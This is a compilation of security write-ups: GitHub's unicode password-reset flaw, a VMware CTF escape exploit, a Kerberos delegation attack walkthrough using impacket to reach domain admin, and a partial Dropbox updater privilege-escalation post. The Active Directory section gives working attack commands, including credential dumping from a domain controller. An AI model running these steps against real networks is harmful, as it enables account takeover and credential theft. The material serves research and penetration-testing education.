Case Study : Exploiting a Business Logic Flaw with GitHub’s Forgot Password workflow (discovered by John Gracey)

Original text by Chetan Conikee

John Gracey of Wisdom published a very interesting business logic flaw in GitHub’s reset password workflow on November 28th, 2019. It was acknowledged and fixed by GitHub’s security team. If not mitigated, this flaw can lead to account takeover vulnerability (specifically for accounts with 2FA not enabled).

From ASCII to Unicode

ASCII (American Standard Code for Information Interchange) had became the first widespread encoding scheme. However, it was limited to only 128 character definitions. This was fine for the most common English characters, numbers, and punctuation, but slowly became limiting for the rest of the world.

Naturally, the rest of the world wanted the same encoding scheme for their characters too, which was why the Unicode standard was created. The objective of Unicode was to unify all the different encoding schemes so that the confusion between computers can be limited as much as possible.

As John Gracey points out, developer understanding of unicode is often limited to internationalization and hence fail to grok details associated with unicode points and units. This lack of understanding could lead to an inherent vulnerability called Unicode Case Mapping Collision.

Loosely speaking, a collision occurs when two different characters are uppercased or lowercased into the same character. This effect is found commonly at the boundary between two different protocols, like email and domain names.

~ John Gracey

On November 24th 2019, GetWisdom had published an exhaustive list of case mapping collisions with english alphabets here . Following this article, John published a detailed case study of the logic flaw here. I’d recommend for you all to read John’s post in detail before you proceed further.

Hacking Unicode Case Mapping Collision

Let us attempt to emulate this business logic workflow associated with resetPassword functionality

  1. Attacker enumerates with a unicode character embedded in local part of email address (not domain part). For example:`jı`
  2. Attacker clicks forgot-password and types the email (for example: `jı` where `ı` is the unicode character)
  3. The business logic supporting forgot-password function receives the attacker controlled email address and case-folds (toLowerCase) as a part of sanitization practice. This case folding transformation leads to a Unicode Case Mapping Collision which fundamentally transforms the identity to another user’s email address — `jı` with a unicode `ı` is transformed into `` due to case mapping collision.
  4. Of course, the validation passes leading to next step of creating a reset link and dispatching an email to address specified via request (which is attacker controlled) and NOT to email-address associated with registered account (retrieved after validating identity).

Let us use this sample spring-boot based application (forked and revised) with forgot password functionality that emulates both a best and worse scenario associated with this logic flaw.conikeec/spring-security-registrationIf you’re already a student of Learn Spring Security, you can get started diving deeper into registration with Module 2…

Refer to controller logic supporting password reset here (with all symptoms that can lead to an exploit)

  1. Attacker enumerates Forgot Password function in SaaS service with an embedded unicode character.
  2. Attacker controlled userEmail parameter is injected into the resetPasswordBad controller routine.
  3. Validation function findUserByEmailaccepts attacker controlled email address that is transformed (via caseFolding) and passes validation condition (if registered user exists).
  4. Email with reset password link is now sent to to address specified via request (which is attacker controlled) and NOT to email-address associated with registered account (retrieved after validating identity).

Automated verification of Business Logic flaws in source code

Let’s fire up ShiftLeft’s Ocular query engine and trace through information flows in order identify all of these missteps leading to this Business Logic Flaw.

git clone

cd spring-security-registration

//compile and create package artifact
mvn -Dmaven.test.skip=true clean package

// Download trial distribution of Ocular ( Install and thereafter fire up the prompt to commence investigation



//retrieve controller mapped to resetPassword route
case class RouteMapping(routeName : String, backingController : String)
val attackSurface ="RequestMapping").map(x =>
    RouteMapping(x.start.parameterAssign.value.code.l.head, x.start.method.fullName.l.head)

attackSurface: List[RouteMapping] = List(

At this stage we have extracted the attack surface and identified all controller functions mapped to exposed routes. Let us proceed to next step.

This route particularly is of interest to us is

RouteMapping( “[\”/user/resetPasswordBad\”]”, “org.baeldung.web.controller.RegistrationController.resetPasswordBad:org.baeldung.web.util.GenericResponse(javax.servlet.http.HttpServletRequest,java.lang.String)” )

CONDITION #1 : Attacker controlled vector (email) with unicode in local part is case folded and then passed to database validation routine

//define the source function and attacker controlled vector (which is the email address parameter)
val source = cpg.method.fullNameExact("org.baeldung.web.controller.RegistrationController.resetPasswordBad:org.baeldung.web.util.GenericResponse(javax.servlet.http.HttpServletRequest,java.lang.String)").parameter.evalType("java.lang.String")

// The DB lookup function is a part of the IUserService interface, implemented by UserService here
val DB_LOOKUP_FN_EXPR = ".*findUserByEmail.*"

//define the sink function that participates in the data flow
val sink ="java.lang.String")

// Verify BUSINESS LOGIC FLAW check to determine if attack controller vector (email) is caseFolded prior to DB lookup

  """ _____________________________________________________________________________________________________________________
 | tracked                | lineNumber| method               | file                                                   |
 | userEmail              | 134       | resetPasswordBad     | org/baeldung/web/controller/|
 | userEmail              | 135       | resetPasswordBad     | org/baeldung/web/controller/|
 | this                   | N/A       | toLowerCase          | java/lang/                                  |
 | ret                    | N/A       | toLowerCase          | java/lang/                                  |
 | userEmail.toLowerCase()| 135       | resetPasswordBad     | org/baeldung/web/controller/|
 | param1                 | N/A       | .assignment| N/A                                                    |
 | param0                 | N/A       | .assignment| N/A                                                    |
 | $r1                    | 135       | resetPasswordBad     | org/baeldung/web/controller/|
 | $r1                    | 135       | resetPasswordBad     | org/baeldung/web/controller/|
 | param0                 | N/A       | findUserByEmail      | org/baeldung/service/                 |

CONDITION #2 : If condition #1 passes, a reset token of a registered user is sent to attacker controlled email (with embedded unicode character)

//define the source function and attacker controlled vector (which is the email address parameter)
val source = cpg.method.fullNameExact("org.baeldung.web.controller.RegistrationController.resetPasswordBad:org.baeldung.web.util.GenericResponse(javax.servlet.http.HttpServletRequest,java.lang.String)").parameter.evalType("java.lang.String")

//define email channel sink function name
val EMAIL_CHANNEL_SINK="org.springframework.mail.javamail.JavaMailSender.send:void(org.springframework.mail.SimpleMailMessage)"

//define the sink function that participates in the data flow
val sink = cpg.method.fullNameExact(EMAIL_CHANNEL_SINK).parameter.evalType("java.lang.String")

// Verify BUSINESS LOGIC FLAW check to determine if attack controller vector (email) is used in emailSend function, rather than the registered user email (determined after fetch from DB in step #1)

res58: List[String] = List(
  """ __________________________________________________________________________________________________________________________________________________________________
 | tracked                                                       | lineNumber| method                     | file                                                   |
 | userEmail                                                     | 134       | resetPasswordBad           | org/baeldung/web/controller/|
 | userEmail                                                     | 139       | resetPasswordBad           | org/baeldung/web/controller/|
 | userEmail                                                     | 198       | constructResetTokenEmailBad| org/baeldung/web/controller/|
 | userEmail                                                     | 201       | constructResetTokenEmailBad| org/baeldung/web/controller/|
 | userEmail                                                     | 213       | constructEmailBad          | org/baeldung/web/controller/|
 | userEmail                                                     | 217       | constructEmailBad          | org/baeldung/web/controller/|
 | param0                                                        | N/A       | setTo                      | org/springframework/mail/        |
 | this                                                          | N/A       | setTo                      | org/springframework/mail/        |
 | email                                                         | 217       | constructEmailBad          | org/baeldung/web/controller/|
 | email                                                         | 218       | constructEmailBad          | org/baeldung/web/controller/|
 | this                                                          | N/A       | setFrom                    | org/springframework/mail/        |
 | this                                                          | N/A       | setFrom                    | org/springframework/mail/        |
 | email                                                         | 218       | constructEmailBad          | org/baeldung/web/controller/|
 | email                                                         | 219       | constructEmailBad          | org/baeldung/web/controller/|
 | ret                                                           | 213       | constructEmailBad          | org/baeldung/web/controller/|
 | this.constructEmailBad("Reset Password",$r11,userEmail)       | 201       | constructResetTokenEmailBad| org/baeldung/web/controller/|
 | param1                                                        | N/A       | .assignment      | N/A                                                    |
 | param0                                                        | N/A       | .assignment      | N/A                                                    |
 | $r12                                                          | 201       | constructResetTokenEmailBad| org/baeldung/web/controller/|
 | $r12                                                          | 201       | constructResetTokenEmailBad| org/baeldung/web/controller/|
 | ret                                                           | 198       | constructResetTokenEmailBad| org/baeldung/web/controller/|
 | this.constructResetTokenEmailBad($r9,$r10,token,$l0,userEmail)| 139       | resetPasswordBad           | org/baeldung/web/controller/|
 | param1                                                        | N/A       | .assignment      | N/A                                                    |
 | param0                                                        | N/A       | .assignment      | N/A                                                    |
 | $r12                                                          | 139       | resetPasswordBad           | org/baeldung/web/controller/|
 | $r12                                                          | 139       | resetPasswordBad           | org/baeldung/web/controller/|
 | param0                                                        | N/A       | send                       | org/springframework/mail/javamail/  |

Safe Coding to prevent this business logic flaw

  1. Observe for anomalous volume of password resets (forgot password requests) initiated upon your application. An attacker is most likely enumerating your end point.
  2. Use two factor authentication (2FA) as a part of validation and reset functions.
  3. As John Gracey suggests, use punycode conversion as a part of your registration, validation and reset functions. Validate for both, local and domain part of email addresses.
  4. Continuously verify your entire fleet of applications in a CI/CD pipeline to ensure that none of the conditions above are violating baseline checks in any current and future releases.
  5. Send out password reset email ONLY to the original email address that was used to create the account and NOT to email address controlled by attacker.

ShiftLeft is an application security platform built over the foundational Code Property Graph that is uniquely positioned to deliver a specification model to query for vulnerable conditionsbusiness logic flaws and insider attacks that might exist in your application’s codebase.

If you’d like to learn more about ShiftLeft, please request a demo.

Stay Safe!

Pwning VMWare, Part 1: RWCTF 2018 Station-Escape

Original text by nafod

Since December rolled around, I have been working on pwnables related to VMware breakouts as part of my advent calendar for 2019. Advent calendars are a fun way to get motivated to get familiar with a target you’re always putting off, and I had a lot of success learning about V8 with my calendar from last year.

To that end, my calendar this year is lighter on challenges than last year. VMware has been part of significantly fewer CTFs than browsers, and the only recent and interesting challenge I noticed was 

 from Real World CTF Finals 2018. To fill out the rest of the calendar, I picked up two additional bugs used at Pwn2Own this year by the talented Fluoroacetate duo. I plan to write an additional blog post about the exploitation of those challenges once complete, with a more broad look at VMware exploitation and attack surface. For now I’ll focus solely on the CTF pwnable and limit my scope to the sections relating to the challenge.

As a final note, I exploited VMware on 

Ubuntu 18.04
 which was the system used by the organizers during RWCTF. On other systems the exploitation could be wildly different and more complicated, due to the change in underlying heap implementation.

The environment (briefly)

I debugged this challenge by using the VMware Workstation bundle inside of another VMware vm. After booting up the victim, I ssh’d into it and then attached to it with gdb in order to debug the 

 process. The actual guest OS doesn’t matter; in my case, I also used 
Ubuntu 18.04
 simply because I had just downloaded the iso.

Diffing for the bug

The challenge itself is distributed with a vmware bundle file and a specific patched VMX binary. Once we install the bundle and compare the 

 to the real 
 in bindiff, we find just a single code block patched, amounting to a few bytes as a bytepatch

bindiff graph comparison

And, in the decompiler, with some comments

v26->state = 1;
v26->virt_time = VmTime_ReadVirtualTime();
sub_1D8D00(0, v5);
v6 = (void (__fastcall *)(__int64, _QWORD, _QWORD))v26->fp_close_backdoor;
v7 = vm_get_user_reg32(3);
v6(v26->field_48, v5, v7 & 0x21);     // guestrpc_close_backdoor
LODWORD(v8) = 0x10000;

Luckily, the changes are very small, and amount to nopping out a struct field and changing the mask of a user controlled flag value.

The change itself is to a function responsible for handling VMware GuestRPC, an interface that allows the guest system to interact with the host via string-based requests, like a command interface. Much has been written about GuestRPC before, but briefly, it provides an ASCII interface to hypervisor internals. Most commands are short strings in the form of setters and getters, like 

tools.capability.dnd_version 3
. Internally, the commands are sent over “channels”, of which there can be 8 at a time per guest. The flow of operations in a single request includes:

0. Open channel
1. Send command length
2. Send command data
3. Receive reply size
4. Receive reply data
5. "Finalize" transfer
6. Close channel

As a final note, guestrpc requests can be sent inside the guest userspace, so bugs in this interface are particularly interesting from an attacker perspective.

The bug

Examining the changes, we find that they’re all in request type 5, corresponding to 

. The user controls the argument which is 
& 0x21
 and passed to 

void __fastcall guestrpc_close_backdoor(__int64 a1, unsigned __int16 a2, char a3)
  __int64 v3; // rbx
  void *v4; // rdi

  v3 = a1;
  v4 = *(void **)(a1 + 8);
  if ( a3 & 0x20 )
  else if ( !(a3 & 0x10) )
    sub_176D90(v3, 0);
    if ( *(_BYTE *)(v3 + 0x20) )
      vmx_log("GuestRpc: Closing RPCI backdoor channel %u after send completion\n", a2);
      *(_BYTE *)(v3 + 32) = 0;

Control of 

 allows us to go down the first branch in a previously inaccessible manner, letting us free the buffer at 
, which corresponds to the buffer used internally to store the reply data passed back to the user. However, this same buffer will also be freed with command type 6, 
, resulting in a controlled double free which we can turn into use-after-free. (The other patch nop’d out code responsible for NULLing out the reply buffer, which would have prevented this codepath from being exploited.)

Given that the bug is very similar to a traditional CTF heap pwnable, we can already envision a rough path forward, for which we’ll fill in details shortly:

  • Obtain a leak, ideally of the 
     binary text section
  • Use tcache to allocate a chunk on top of a function pointer
  • Obtain 
     control and invoke 
    system("/usr/bin/xcalc &")

Heap internals and obtaining a leak

Firstly, it should be stated that the vmx heap appears to have little churn in a mostly idle VM, at least in the heap section used for guestrpc requests. This means that the exploit can relatively reliable even if the VM has been running for a bit or if the user was previously using the system.

In order to obtain a heap leak, we’ll perform the following series of operations

  1. Allocate three channels [A], [B], and [C]
  2. Send the 
     commmand to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap.
  3. Open channel [B] and issue a 
     to retrieve the data we just set
  4. Issue the reply length and reply read commands on channel [B]
  5. Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer
  6. Invoke 
     on channel [C] and receive the reply length, which allocates a buffer at the same address we just
  7. Close channel [B], freeing the buffer again
  8. Read out the reply on channel [C] to leak our data


 process has a number of associated threads, including one thread per guest vCPU. This means that the underlying glibc heap has both the tcache mechanism active, as well as several different heap arenas. Although we can avoid mixing up our tcache chunks by pinning our cpu in the guest to a single core, we still cannot directly leak a 
 pointer because only the 
 in the glibc heap resides there. Instead, we can only leak a pointer to our individual thread arena, which is less useful in our case.

[#0] Id 1, Name: "vmware-vmx", stopped, reason: STOPPED
[#1] Id 2, Name: "vmx-vthread-300", stopped, reason: STOPPED
[#2] Id 3, Name: "vmx-vthread-301", stopped, reason: STOPPED
[#3] Id 4, Name: "vmx-mks", stopped, reason: STOPPED
[#4] Id 5, Name: "vmx-svga", stopped, reason: STOPPED
[#5] Id 6, Name: "threaded-ml", stopped, reason: STOPPED
[#6] Id 7, Name: "vmx-vcpu-0", stopped, reason: STOPPED <-- our vCPU thread
[#7] Id 8, Name: "vmx-vcpu-1", stopped, reason: STOPPED
[#8] Id 9, Name: "vmx-vcpu-2", stopped, reason: STOPPED
[#9] Id 10, Name: "vmx-vcpu-3", stopped, reason: STOPPED
[#10] Id 11, Name: "vmx-vthread-353", stopped, reason: STOPPED
. . . .

To get around this, we’ll modify the above flow to spray some other object with a vtable pointer. I came across this writeup by Amat Cama which detailed his exploitation in 2017 using drag-n-drop and copy-paste structures, which are allocated when you send a guestrpc command in the host vCPU heap.

Therefore, I updated the above flow as follows to leak out a vtable/

-bss pointer

  1. Allocate four channels [A], [B], [C], and [D]
  2. Send the 
     commmand to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap.
  3. Open channel [B] and issue a 
     to retrieve the data we just set
  4. Issue the reply length and reply read commands on channel [B]
  5. Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer
  6. Invoke 
     on channel [C] and receive the reply length, which allocates a buffer at the same address we just
  7. Close channel [B], freeing the buffer again
  8. Send 
     on channel [D], which allocates an object with a vtable on top of the chunk referenced by [C]
  9. Read out the reply on channel [C] to leak the vtable pointer

One thing I did notice is that the copy-paste and drag-n-drop structures appear to only allocate their vtable-containing objects once per guest execution lifetime. This could complicate leaking pointers inside VMs where guest tools are installed and actively being used. In a more reliable exploit, we would hope to create a more repeatable arbitrary read and write primtive, maybe with these heap constructions alone. From there, we could trace backwards to leak our vmx binary.

Overwriting a channel structure

Once we have obtained a vtable leak, we can begin looking for interesting structures in the BSS. 

 in its GOT, so we can also jump to the stub as a proxy for 
’s address.

I chose to target the underlying 

 structures which are created when you open a guestrpc channel. 
 has an array of 8 of these structures (size 0x60) inside its BSS, with each structure containing several buffer pointers, lengths, and function pointers.

Most notably, this structure matches up favorably to our code above in 


// v6 is read from the channel structure...
v6 = (void (__fastcall *)(__int64, _QWORD, _QWORD))v26->fp_close_backdoor;

// . . . .

// ... and so is the first argument
v6(v26->field_48, v5, v7 & 0x21);     // guestrpc_close_backdoor

To target this, we’ll abuse the tcache mechanism in glibc 2.27, the glibc version in use on the host system. In that version of glibc, tcache was completely unprotected, and by overwriting the first quadword of a freed chunk on a tcache freelist, we can allocate a chunk of that size anywhere in memory by simplying subsequently allocating that size twice. Therefore, we make our exploit land on top of a channel structure, set bogus fields to control the function pointer and argument, and then invoke 

 to call 
. The full steps are as follows:

  1. Allocate five channels [A], [B], [C], [D], and [E]
  2. Send the 
     commmand to channel [A], which allows us to store arbitrary data of arbitrary size (up to a limit) in the host heap. a. This time, populate the 
     value such that its first 8 bytes are a pointer to the 
     array in the BSS.
  3. Open channel [B] and issue a 
     to retrieve the data we just set
  4. Issue the reply length and reply read commands on channel [B]
  5. Invoke the buggy finalize command on channel [B], freeing the underlying reply buffer
  6. Invoke 
     on channel [C] and receive the reply length, which allocates a buffer at the same address we just
  7. Close channel [B], freeing the buffer again
  8. Invoke 
     on channel [D] to flush one chunk from the tcache list; the next chunk will land on our channel
  9. Send a “command” to [E] consisting of fake chunk data padded to our buggy chunksize. This will land on our 
     BSS data and give us control over a channel
  10. Invoke 
     on our corrupted channel to pop calc


This was definitely a light challenge with which to dip my feet in VMware exploitation. The exploitation itself was pretty vanilla heap, but the overall challenge did involve some RE on the 

 binary, and required becoming familiar with some of the attack surface exposed to the guest. For a CTF challenge, it hit roughly the appropriate intersection of “real world” and “solvable in 48 hours” that you would expect from a high quality event. You can find my final solution script in my advent-vmpwn github repo.

From here on out, my advent calendar involves 2 CVEs, both of which are in virtual hardware devices implemented by the 

 binary. Furthermore, neither has a public POC nor details on exploitation, so they should be more interesting to dive in to. So, stay tuned for my next post if you’re interested on digging into the underpinnings of USB 😉

The Weak Bug — Exploiting a Heap Overflow in VMware

Real World CTF 2018 Finals Station-Escape Writeup (challenge files are linked here!)

No Shells Required — a Walkthrough on Using Impacket and Kerberos to Delegate Your Way to DA

Original text by Red XOR Blue

There are a ton of great resources that have been released in the past few years on a multitude of Kerberos delegation abuse avenues.  However, most of the guidance out there is pretty in-depth and/or focuses on the usage of @Harmj0y’s Rubeus.  While Rubeus is a super well-written tool that can do quite a few things extremely well, in engagements where I’m already running off of a primarily Linux environment, having tools that function on that platform can be beneficial.  To that end, all the functionality we need to perform unconstrained, constrained, and resource-based constrained delegation attacks is already available to us in the impacket suite of tools.
This post will cover how to identify potential delegation attack paths, when you would want to use them, and give detailed walkthroughs of how to perform them on a Linux platform.  What we won’t be covering in this guide is a detailed background of Kerberos authentication, or how various types of delegation work in-depth, as there are some really great articles already out that go into a ton of detail on the inner-workings of the protocol.  If you are interested in a deeper dive, the most comprehensive & enlightening post I’ve read is @Elad_Shamir’s write-up:

Unconstrained Delegation

What Is It?

Back in the early days of Windows Active Directory (pre-Server 2003) this was really the only way to delegate access, which at a high level effectively means configuring a service with privileges to impersonate users elsewhere on the network.  Unconstrained Delegation would be used for something like a front-end web server that needed to take in requests from users, and then impersonate those users to access their data on a second database server.  

Unfortunately, as the name implies, these impersonation rights were not limited to a single system or service, but rather allowed a configured account to impersonate anyone that authenticated against it anywhere on the network.  This is due to the fact that when an object authenticates to a service tied to an account configured with unconstrained delegation, they send the remote service a copy of their TGT (Ticket Granting Ticket), which allows the remote system to generate new TGS (Ticket Granting Service / service ticket) requests at-will.  These TGS’ are used for authenticating to Kerberos-enabled services across the network, meaning that if you possess an object’s TGT you can impersonate them anywhere on the network where you can authenticate with Kerberos.

When To Use:

If you can gain access to an account (user or computer) that is configured with unconstrained delegation.  To identify users & computers configured with unconstrained delegation I use pywerview, a python port of a good chunk of powerview’s functionality ( but feel free to use whatever tools works best for you. This tool has handy flags to pull both accounts configured with both constrained + unconstrained delegation.  In this case what we’re really looking for is any user or computer with a UserAccountControl attribute that includes ‘TRUSTED_FOR_DELEGATION’.  All we’ll need at this point is a set of creds for AD to allow us to do the enumeration.  Taking a look at the output of the check we ran below, we can see that the user ‘unconstrained’ is configured with unconstrained delegation:

If you have find you have access to a computer object that is configured with unconstrained delegation, it may be easier simply to perform the print spooler attack and extract the ticket from memory using Rubeus, as detailed here:  However, if you have access to a user account configured with delegation or would prefer to avoid running code on remote systems as much as possible, the following should be helpful.

Process Walkthrough:

Note: This section is pretty much a direct walkthrough of the awesome work @_dirkjan wrote up in his blog here: If you’re familiar with this style of attack it’s nothing new, just a (hopefully) fairly straightforward walkthrough of the path that I’ve had the most success with on engagements after identifying unconstrained delegation.
If we do end up identifying any user accounts configured with unconstrained delegation, we’ll want to obtain Kerberos tickets we can attempt to crack.  For an account to be configured with delegation, they also need to be configured with an SPN (Service Principal Name).  This means that we should be able to retrieve a crackable Kerberos ticket for the account using DOMAIN/USER:PASSWORD -request-user UNCONSTRAINED_USER

Assuming we’re able to recover the password for an account / used another method to get admin access on a computer configured with unconstrained delegation, we can now move on to attempting to leverage this access to get DA on the network.  We’ll start by attempting to add an SPN to the account we have access to. This is the only part of the attack that will require non-default settings to be configured (for a user account), but per all the sql devs on stack exchange asking how to enable it, it seems to be something that should be commonly turned on already.  If we have access to a computer account configured with unconstrained delegation, we can use the ‘Validated write to DNS host name’ security attribute (configured by default) to add an additional hostname to the object, which will automatically configure new SPN’s that will also be configured with unconstrained delegation. We then just have to create a new DNS record to point that new hostname to us.
We’ll be using dirk-jan’s krbrelayX toolkit for the rest of this process (, first using to attempt to add a ‘host’ spn for a nonexistent system on the network.  Note – it is important to ensure when you’re adding an SPN you use the fqdn of the network, not just the hostname.  You’ll see one of two messages, based on if your account has privileges to modify its own SPN’s (above = an account with appropriate attributes set, below = attribute not set). -u DOMAIN\\USER -p PASSWORD -s host/FAKESYSTEM.FQDN ldap://DC.FQDN

If you don’t have privileges, this is pretty much the end of this potential vector, although I would still recommend targeting the systems(s) on which the account has SPN’s configured for, as they likely have TGT’s in-memory.
However, if we are able to successfully add an SPN for a non-existent system we can keep going.  Next, we’ll want to add a DNS record for this same non-existent system that links back to our system’s IP, effectively turning our system into this non-existent system.  Due to the actions we took in the last step (creating an SPN for the ‘host’ service with our user configured with unconstrained delegation on this non-existent hostname that now points to our system), we are basically creating a new ‘computer’ on the network that has unconstrained delegation configured on the ‘host’ service on it. 
We’ll be using another part of the krbrelayx toolkit,, to complete this step to create a new DNS record and then point it at the IP of our attack box (Note: dns records take ~3 minutes to update, so don’t worry if you complete this step and cant immediately ping / nslookup your new host): -u DOMAIN\\USERNAME -p PASSWORD -r FAKESYSTEM.FQDN -a add -d YOUR_IP DC_HOSTNAME

Everything should be ready to go now, we’ll execute the print spooler bug to force the DC$ account to attempt to authenticate to the host service of our new ‘computer’ that is configured with unconstrained delegation.  This will in turn cause the DC to provide a copy of its TGT when authenticating, which we can then use to impersonate it on any other Kerberos-enabled service.  In one window we’ll set up as follows: **This is very important**  the krbsalt is the FQDN of the domain in ALL CAPS, followed immediately by the username (case-sensitive).  The Krbpass is the user’s password, nothing crazy there. --krbsalt DOMAIN.FQDNUsernameCaseSensitive --krbpass PASSWORD

Once you have that running in one window, we’ll use the final tool within the krbrelayx toolkit to kick off the attack (Note: The user used to kick off the attack doesn’t matter, it can be any domain user).  The below shows what the successful attack looks like: DOMAIN/USERNAME:PASSWORD@DC_HOSTNAME FAKE_SYSTEM.FQDN

On our krbrelayx window, we should see that we have gotten an inbound connection, and have obtained a tgt (formatted as .ccache) file for the DC$ account:

At this point, we just need to export the ticket we received into memory, after which we should be able to run secretsdump against the DC:

export KRB5CCNAME=CCACHE_FILE.CCACHE -k DC_Hostname -just-dc

Constrained Delegation

What Is It?

Microsoft’s next iteration of delegation included the ability to limit where objects had delegation (impersonation) rights to.  Now a front-end web server that needed to impersonate users to access their data on a database could be restricted; allowing it to only impersonate users on a specific service & system.  However, as we will find out, the portion of the ticket that limits access to a certain service is not encrypted.  This gives us some room to gain additional access to systems if we gain access to an object configured with these rights.

When To Use:

If you can gain access to an account (user or computer) that is configured with constrained delegation.  You can find this by searching for the ‘TRUSTED_TO_AUTH_FOR_DELEGATION’ value in the UserAccountControl attribute of AD objects.  This can be also be found through the use of Pywerview, as outlined in the above section.

Process Walkthrough:

This time, we’ll start by targeting another account, httpDelegUser.  As we can see from our initial enumeration with Pywerview, this account has the ‘TRUSTED_TO_AUTH_FOR_DELEGATION’ flag set.  We can also check the contents of the account’s msDS-AllowedToDelegateTo attribute to determine that it has delegation privileges to the www service on Server02.  Not the worst thing in the world, but probably not going to get us a remote shell.

Also a quick recap of the account’s group memberships:

To start this attack, we’ll use another impacket tool – – to retrieve a ticket for an impersonated user to the service we have delegation rights to (the www service on server02 in this case).  In this example we’ll impersonate ‘bob’, a domain admin in this environment.  Note: If a user is marked as ‘Account is sensitive and cannot be delegated’ in AD, you will not be able to impersonate them. -spn SERVICE/HOSTNAME_YOU_HAVE_DELEGATION_RIGHTS_TO.FQDN -impersonate TARGET_USER DOMAIN/USERNAME:PASSWORD

From here, the initial assumption would be that we could only authenticate against the www service on server02 with this ticket.  However, Alberto Solino discovered that the service name portion of the ticket (sname) is not actually a protected part of the ticket.  This allows us to change the sname to any value we want, as long as its another service running under the same account as the original one we have delegation rights to.  For example, if our account (httpDelegUser) has delegation rights to a service that the server02 computer object is running (example SPN: www/server02), we can change our sname to any other SPN associated with server02 (ex. cifs/server02).  His blog on the mechanism by which this occurs is super insightful, and worth a read:
Even better for us, as Alberto Solino is one of the primary writers of impacket, he built this logic in so that these sname conversions happen automatically for us on the back-end:

From an operational standpoint, what this means is that the ticket for the www service we obtained in the step above can be loaded into memory and used to use just about any of the impacket suite of tools to run commands, dump SAM, etc.

Resource-Based Constrained Delegation

What Is It?

Note: Microsoft is releasing an update in January 2020 that will enable LDAP channel binding & LDAP signing by default on Windows systems, remediating this potential attack vector on fully patched systems. 

Starting with Windows Server 2012, objects in AD could set their own msDS-AllowedToActOnBehalfOfOtherIdentity attribute, effectively allowing objects to set what remote objects had rights to delegate to them.  This allows those remote objects with delegation rights to impersonate any account in AD to any service on the local system.  Therefore, if we can convince a remote system to add an object that we control to their msDS-AllowedToActOnBehalfOfOtherIdentity attribute, we can use it to impersonate any other user not marked as ‘Account is sensitive and cannot be delegated’ on it.

When To Use:

Basically, when you’re on a network and want to get a shell on a different system on that same network segment.  This attack can be ran without needing any prior credentials, as described by @_dirkjan in his blog here: .  However, the method described does require that a domain controller in the environment is configured with LDAPS; which seems to be somewhat uncommon based on the environments I’ve tested against over the past 6 months.           

I’ll focus on a secondary scenario for this attack – one where you have compromised a standard low-privilege user account (no admin rights) or a computer account, and are on a network segment with other systems you want to compromise.

Process Walkthrough:

To begin with, what this attack really needs is *some* sort of account that is configured with an SPN.  This can be a computer account, a user account that is already configured with an SPN, or can be a computer account we create using a non-privileged user account by taking advantage of a default MachineAccountQuota configuration (  We need an account that is configured with an SPN as this is a requirement if we want the TGS produced by S4U2Self to be forward-able (Read more why this is necessary here:  Computer accounts work as by default they are configured with a variety of SPN’s for all their various Kerberos-enabled services.
So, in our example let’s say we only have a low privilege account (we’ll use the ‘tim’ account). 

The first step in the process would be to try and create a computer account, so that we could gain control of an account configured with SPN’s.  To do this, we’ll use a relatively new impacket example script –  This script has a SAMR option to add a new computer, which functions over SMB and uses the same mechanism as when a new computer is added to a domain using the Windows GUI. -method SAMR -computer-pass MADE_UP_PASSWORD -computer-name MADE_UP_NAME DOMAIN/USER:PASSWORD

After running this command, your new computer object will be added to AD (Note: this example script was not fully working for me in python2.7 – the computer object was added but its password was not being appropriately set.  It does work using Python3.6 though.)

This script was released fairly recently, prior to it I used PowerMad.ps1 from a Windows VM to perform the same actions.  This tool uses a standard LDAP connection vs. SAMR, but the end result is the same.  For further info on PowerMad I recommend the following:
If this part of the attack didn’t work, the default MachineAccountQuota has likely been changed for users in the environment.  In that case you’ll need to use alternative methods to obtain a computer account / user account configured with an SPN.  However, once you have that, you can continue to proceed as described below.
For the next part of the attack we’ll be using mitm6 + ntlmrelayx.  Unlike a traditional NTLM relay attack, really what we’re interested in is intercepting machine account hashes, as we can forward them to LDAP on a domain controller.  This allows us to impersonate the relayed computer account and set its msDS-AllowedToActOnBehalfOfOtherIdentity attribute to include the computer object that we control.  Note: We unfortunately can’t relay SMB to LDAP due to the NTLMSSP_NEGOTIATE_SIGN flag set on SMB traffic, so will be focusing on intercepting HTTP traffic, such as windows update requests. 
We’ll first set up ntlmrelayx to delegate access to the computer account we just made & have control of (rbcdTest): -wh WPAD_Host --delegate-access --escalate-user YOUR_COMPUTER_ACCOUNT\$ -t ldap://DOMAIN_CONTROLLER

We next start a relay attack using or other relay tool, and wait for requests to start coming in.  Eventually you should see something that looks like the following:

In the above screenshot we can see that we successfully relayed the incoming auth request made by the server02$ account to LDAP on the domain controller and modified the object’s privileges to give rbcdTest$ impersonation rights on the system.
Once we have delegation rights, the rest of the attack is fairly straightforward.  We’ll use another impacket tool – – to create the TGS necessary to connect to Server02 using an impersonated identity.
This tool will get us a Kerberos service ticket (TGS) that is valid for a selected service on the remote system we relayed to LDAP (Server02).  As the rbcdTest$ account has delegation rights on this system, we are able to impersonate any user that we want, in this case choosing to impersonate ‘administrator’, a domain admin on the testlab.local network. -spn cifs/Server_You_Relayed_To_Get_RBCD_Rights_On -impersonate TARGET_ACCOUNT  DOMAIN/YOUR_CREATED_COMPUTER_ACCOUNT\$:PASSWORD

With the valid ticket saved to disk, all we need to do is export it to memory, which will then allow us to remotely connect to the remote system with administrative privileges:

From dropbox(updater) to NT AUTHORITY\SYSTEM

Original text by @decoder_it

Hardlinks again! Yes, there are plenty of opportunities to raise your privileges due to incorrect permissions settings when combined with  hardlinks in many softwares (MS included) 

In this post I’m going to show how to use the DropBoxUpdater  service in order to get SYSTEM privileges starting from a simple Windows user. I found and exploited this “vulnerability”  along with my usual “business partner” @padovah4ck.

Please note:  I’m not going to release any source code,  my goal is to share knowledge, not tools.

The DropBoxUpdater is part of the Dropbox Client Software suite, and according to the Software manufacturer, it is used for keeping the client up-to-date:


The updater is installed as a service and 2 scheduled tasks, and to be honest,  I really don’t know why… but let’s go on. Keep in mind that in standard installations they run as SYSTEM  and one of the dropboxupdate task is run every hour by the task scheduler.


Each time dropboxupdate is  triggered, it writes log files in this directory:

  • c:\ProgramData\Dropbox\Update\Log

Permissions are the following:


As you can see, users can add file in this directory.

Logfiles have a special format:


And the file naming convention is:

Users can overwrite and delete these files:


Even more interesting is a SetSecurity call made by SYSTEM on these files:


Seems familiar, isn’t it? If you read my previous post, you already know that this is exploitable via “hardlinks

But we have a problem here, we have to “guess” the logfile name,  that is the exact time (including milliseconds) and the PID of the updater process

